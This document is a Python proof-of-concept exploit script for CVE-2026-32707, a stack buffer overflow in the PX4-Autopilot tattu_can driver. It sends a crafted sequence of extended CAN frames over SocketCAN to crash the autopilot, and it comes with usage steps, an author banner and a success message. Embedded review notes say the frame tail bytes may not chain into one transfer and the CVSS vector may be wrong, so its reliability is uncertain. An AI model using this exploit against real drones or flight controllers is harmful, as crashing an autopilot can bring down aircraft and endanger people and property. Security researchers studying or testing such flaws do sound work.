#!/usr/bin/env python3
# Exploit Title: PX4-Autopilot tattu_can Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32707
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected: versions <= 1.17.0-rc1 (tattu_can driver)
# Tested on: Ubuntu 22.04 / PX4 SITL with vcan0
# Category: Denial of Service (DoS)
# Platform: Linux (SocketCAN)
# Exploit Type: Stack Overflow
# CVSS: 7.5 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (vector as published; note the precondition below is CAN bus access, which CVSS 3.x would normally score as AV:A or AV:P rather than AV:N)
# CWE: CWE-121 (Stack-based Buffer Overflow)
# Description: The tattu_can driver in PX4-Autopilot versions <=1.17.0-rc1
# performs an unbounded memcpy when reassembling multi-frame CAN messages,
# allowing an attacker with CAN bus access to corrupt the stack and crash
# the autopilot.
# Fixed in: commit 3f04b7a (PX4-Autopilot 1.17.0-rc2)
# Usage:
# python3 exploit.py <can_interface>
# Examples:
# python3 exploit.py vcan0
# python3 exploit.py can0
# Options:
# <can_interface> - name of the CAN network interface (e.g., vcan0, can0)
# Notes:
# - Requires python-can library: pip install python-can
# - Root (CAP_NET_ADMIN) is needed to create or bring up the CAN interface (Step 2); opening a SocketCAN raw socket to send on an existing interface does not itself require CAP_NET_RAW
# - The target must have tattu_can started (e.g., 'tattu_can start')
# How to Use
# Step 1: Install python-can: pip install python-can
# Step 2: Create virtual CAN if needed: sudo modprobe vcan && sudo ip link add dev vcan0 type vcan && sudo ip link set up vcan0
# Step 3: Run: sudo python3 exploit.py vcan0
# Banner shown as soon as the module loads, before imports and argument parsing.
# Kept as a raw string so the box-drawing characters and backslashes are literal.
_BANNER = r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║
║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║
║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║
║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║
║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║
║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║
║ ║
║ [ b a n y a m e r _ s e c u r i t y ] ║
║ ║
║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║
║ ║
║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ Exploit : CVE-2026-32707 ║
║ Target : PX4-Autopilot • tattu_can driver • CAN bus ║
║ ║
║ Status : ACTIVE ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
"""
print(_BANNER)
import sys
import can
import time
# Frame geometry and protocol constants consumed by main().
CAN_ID = 0x123  # arbitration ID every frame is sent on (sent as a 29-bit extended ID);
                # arbitrary value — whether the target driver's acceptance filter
                # consumes it must be confirmed against the driver source
OVERFLOW_DLC = 8  # classic-CAN maximum DLC; each overflow frame is filled to this length
TAIL_BYTE_START_OF_TRANSFER = 1 << 7  # 0x80: bit 7 set, presumably the DroneCAN/UAVCAN v0
                                      # tail-byte "start of transfer" flag with transfer ID 0
                                      # — confirm against the driver's tail-byte parsing
TATTLES_STRUCT_SIZE = 48  # presumably the size of the driver-side struct the advisory says
                          # is overrun; not referenced elsewhere in this script
START_OFFSET = 5  # not referenced elsewhere in this script
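def _extended_frame(data: list[int]) -> "can.Message":
    """Build one extended-ID (29-bit) frame on CAN_ID carrying *data*.

    The DLC is taken from the payload length, which is 8 for every frame this
    script sends.  python-can's socketcan backend ORs CAN_EFF_FLAG into the
    kernel can_id itself when ``is_extended_id`` is set, so the flag is not
    folded into ``arbitration_id`` here.  (The original did that via
    ``can.CAN_EFF_FLAG``, which is not a top-level python-can name — it lives
    under ``can.interfaces.socketcan.constants`` — so that line could fail
    with AttributeError before any frame was sent.)
    """
    return can.Message(
        arbitration_id=CAN_ID,
        data=data,
        is_extended_id=True,
        dlc=len(data),
    )


def main() -> None:
    """Send the DoS frame sequence from the header on the interface named in argv[1].

    Sequence: one start-of-transfer frame, seven 8-byte filler frames paced
    10 ms apart, then one final 8-byte frame, all as extended frames on
    CAN_ID.  Exits with status 1 on a usage error, if the interface cannot be
    opened, or if any send fails; the bus is always shut down on exit.

    NOTE(review): on a DroneCAN/UAVCAN v0 bus the last byte of each frame is
    the tail byte (SOT/EOT/toggle/transfer-ID bits).  The filler and final
    frames here put plain payload there (0x41.., 0x42 — values that carry
    bit 6, the EOT bit), and no toggle bookkeeping is done, so a driver that
    validates toggle/EOT would not chain them into one transfer.  Confirm
    against the vulnerable reassembly code before relying on this PoC.
    """
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <can_interface>")
        sys.exit(1)
    iface = sys.argv[1]

    try:
        bus = can.interface.Bus(channel=iface, bustype='socketcan', fd=False)
    except Exception as e:  # python-can raises several types here; report and stop
        print(f"Failed to open CAN interface {iface}: {e}")
        sys.exit(1)

    try:
        print(f"[*] Sending start-of-transfer frame on {iface} (can_id=0x{CAN_ID:08X})")
        bus.send(_extended_frame(
            [0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x00, TAIL_BYTE_START_OF_TRANSFER]
        ))

        # 7 filler frames of OVERFLOW_DLC bytes; with the start and final frames the
        # total appended payload is presumably sized to exceed TATTLES_STRUCT_SIZE —
        # the frame count is not derived from it, so confirm before changing either.
        print(f"[*] Sending 7 overflow frames (each copies {OVERFLOW_DLC - 1} bytes)...")
        for i in range(7):
            # Fill byte cycles 'A'..'Z' so individual frames are distinguishable in a candump trace.
            bus.send(_extended_frame([ord('A') + (i % 26)] * OVERFLOW_DLC))
            time.sleep(0.01)  # brief pacing so the receiver's RX path is not the bottleneck

        print("[*] Sending final overflow frame...")
        bus.send(_extended_frame([0x42] * OVERFLOW_DLC))
        print("[+] Attack sequence completed. The PX4 tattu_can driver should now crash.")
    except can.CanError as e:
        # A failed send (e.g. interface went down, TX queue full) previously
        # propagated as an unhandled traceback and leaked the socket.
        print(f"Failed to send on {iface}: {e}")
        sys.exit(1)
    finally:
        # Release the SocketCAN socket on every path, including sys.exit() above.
        bus.shutdown()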
if __name__ == "__main__":
    # main() returns None on success (exit status 0) and calls sys.exit(1) itself on errors.
    raise SystemExit(main())